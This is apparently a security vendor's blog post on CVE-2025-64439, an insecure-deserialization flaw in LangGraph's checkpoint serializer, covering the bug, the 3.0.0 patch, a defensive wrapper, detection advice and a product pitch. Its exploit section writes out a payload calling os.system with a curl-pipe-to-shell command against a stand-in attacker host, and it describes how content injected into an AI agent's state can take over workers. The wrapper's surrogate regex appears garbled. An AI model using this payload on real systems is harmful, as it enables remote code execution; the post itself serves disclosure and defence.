Agent Security

LangGraph CVE-2025-64439: When Agent Checkpoints Become RCE

A JsonPlusSerializer fallback in langgraph-checkpoint let attacker-controlled payloads execute arbitrary Python on deserialization. We unpack the bug, the patch, and what agent operators must change.

Nayan Dey
Security Researcher
6 min read

LangChain's langgraph-checkpoint package, which sits underneath an estimated 20 million monthly downloads of LangGraph agent code, shipped a serialization fallback that turned every persisted checkpoint into a potential RCE primitive. The vulnerability, disclosed on November 13, 2025 as CVE-2025-64439 (CVSS 7.4) and tracked as GHSA-wwqv-p2pp-99h5, lives in JsonPlusSerializer — the default serializer for checkpoint persistence. When msgpack fails (most commonly on illegal Unicode surrogates supplied by an LLM), the serializer silently falls back to a JSON mode that supports a constructor format for custom objects, and that constructor format will invoke arbitrary callables like os.system during deserialization. The patch ships in langgraph-checkpoint 3.0.0 with an allowlist for permitted constructors and the JSON fallback removed entirely. For anyone running LangGraph in production, the post-mortem reads like a textbook insecure-deserialization story dressed up in agent clothes.

How does an LLM trigger the JsonPlusSerializer fallback?

The intended path is msgpack: efficient, binary, no execution semantics. The problem is that LLM output frequently contains lone surrogates — the U+D800–U+DFFF range — because models tokenize at the byte-pair level and occasionally emit half of a UTF-16 surrogate pair. msgpack refuses to serialize lone surrogates and raises. The serializer catches that exception and falls back to a JSON representation that supports a {"lc": 2, "type": "constructor", "id": ["module", "function"], "kwargs": {...}} envelope. On deserialization, the loader resolves the dotted path and calls it with the supplied kwargs. An attacker who can place text into the agent's state — through chat history, tool output, retrieved documents, anywhere — can therefore plant a payload that executes when the checkpoint is later loaded by a worker, an analyst, or a scheduled job.

What does an exploit actually look like in practice?

The PurpleOps and ResolvedSecurity write-ups both publish minimal proofs of concept. The shape is: place a string containing a lone surrogate into the agent state to force the fallback, then place a second payload that uses the constructor envelope to call os.system("curl attacker.example.com | sh") or any other Python callable. Because checkpoints are typically persisted to Postgres, SQLite, or Redis and re-read by other workers, the trigger is decoupled from the write. A user who interacts with an agent today can compromise the worker that resumes the conversation tomorrow. In multi-tenant LangGraph deployments — LangGraph Cloud, internal platforms, RAG-augmented chat — that decoupling is the worst part: the blast radius is "every worker that touches the checkpoint table," not "the worker that handled the malicious turn."

Which deployments are realistically exposed?

Three patterns are at maximum risk. First, any deployment that accepts text from end users and persists checkpoints — almost every chat application on LangGraph qualifies. Second, deployments that ingest tool outputs from third-party APIs and store them in graph state, which describes most agentic workflows that call external services. Third, multi-tenant platforms where checkpoints from one tenant are resumed by workers shared across tenants — those collapse the tenant boundary into the deserialization boundary. Deployments that use a strict in-process serializer, that never persist checkpoints, or that already restrict checkpoint reads to the same process that wrote them are less exposed, but they are also less common in production.

What does the 3.0.0 patch actually change?

The fix replaces the implicit constructor execution with an explicit allowlist. Only a hardcoded set of module-and-class combinations may be reconstructed through the JSON path, and the unsafe fallback is deprecated. Operators who upgrade to 3.0 should additionally configure their checkpoint sanitization layer to strip lone surrogates from incoming state before persistence so that the fallback path is never even reached. The snippet below shows a minimal defensive wrapper for any LangGraph application that cannot upgrade immediately, which strips surrogates and rejects constructor envelopes outright.

# pre-upgrade defensive checkpoint wrapper
import re
import json
from langgraph.checkpoint.serde.jsonplus import JsonPlusSerializer

SURROGATE_RE = re.compile(r"[�-�]")
ALLOWLIST_MODULES = {"datetime", "decimal", "uuid", "pydantic.main"}

class HardenedSerializer(JsonPlusSerializer):
    def dumps_typed(self, obj):
        # strip lone surrogates so we never trigger the JSON fallback
        if isinstance(obj, str):
            obj = SURROGATE_RE.sub("", obj)
        return super().dumps_typed(obj)

    def loads_typed(self, data):
        kind, payload = data
        if kind == "json":
            parsed = json.loads(payload)
            self._reject_constructors(parsed)
        return super().loads_typed(data)

    def _reject_constructors(self, node):
        if isinstance(node, dict):
            if node.get("lc") == 2 and node.get("type") == "constructor":
                module = (node.get("id") or [None])[0]
                if module not in ALLOWLIST_MODULES:
                    raise ValueError(f"blocked constructor: {module}")
            for v in node.values():
                self._reject_constructors(v)
        elif isinstance(node, list):
            for v in node:
                self._reject_constructors(v)

What signals should defenders be hunting in checkpoint stores?

The cheapest detection is a scan of every checkpoint blob for the string "type": "constructor" outside the allowlist. Even before the CVE was disclosed, that pattern was rare in legitimate checkpoints — most agent state is dicts of primitives plus pydantic models, which round-trip through msgpack. A hit on constructor with a module path in os, subprocess, posix, nt, ctypes, builtins.eval, or builtins.exec is the smoking gun. For deployments that cannot grep the blob directly, hash the serialized payload at write time and alert on any payload that exceeds a fixed size relative to the agent's average state, since exploit payloads tend to be longer than benign state. Finally, instrument the workers themselves: a successful exploit usually attempts an outbound DNS lookup or a curl to a callback, so egress monitoring on agent workers catches the post-exploitation step.

How should Q4 2025 patching be prioritized against the rest of the agent stack?

LangGraph CVE-2025-64439 sits in the same week as the Anthropic mcp-server-git CVE chain and the CrewAI sandbox-escape set, which together turn the late-2025 agent stack into a patch-or-die quarter. Prioritise in this order: any LangGraph deployment with persisted checkpoints and untrusted input (upgrade to 3.0 within 72 hours), any LangGraph deployment without persisted checkpoints (still upgrade, just at lower urgency), and any internal fork or vendored copy of langgraph-checkpoint (audit for the same fallback pattern, because the bug is in the serializer, not the framework). Across all three, run a tabletop on the question "if a checkpoint store was already poisoned three months ago, how would we know?" — because the dwell time on this class of bug is, by design, long.

How Safeguard Helps

Safeguard's package intelligence ingests the GHSA-wwqv-p2pp-99h5 advisory and immediately flags every LangGraph project in your SBOMs that pins a vulnerable langgraph-checkpoint version. Reachability analysis goes further — it walks the import graph to identify which projects actually instantiate JsonPlusSerializer versus those that vendor LangGraph but use a custom serializer, so triage focuses on the genuinely exposed services. Griffin AI generates a remediation plan that pins langgraph-checkpoint>=3.0.0, adds the surrogate-stripping wrapper above as a defensive backstop, and opens a Jira ticket with the worker rotation steps. Policy gates block deployments that fail the version pin until a maintainer signs off, and the checkpoint-store hunt query — "type": "constructor" outside the allowlist — is pre-built as a Safeguard saved search that can run against any object store ingested into the platform.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.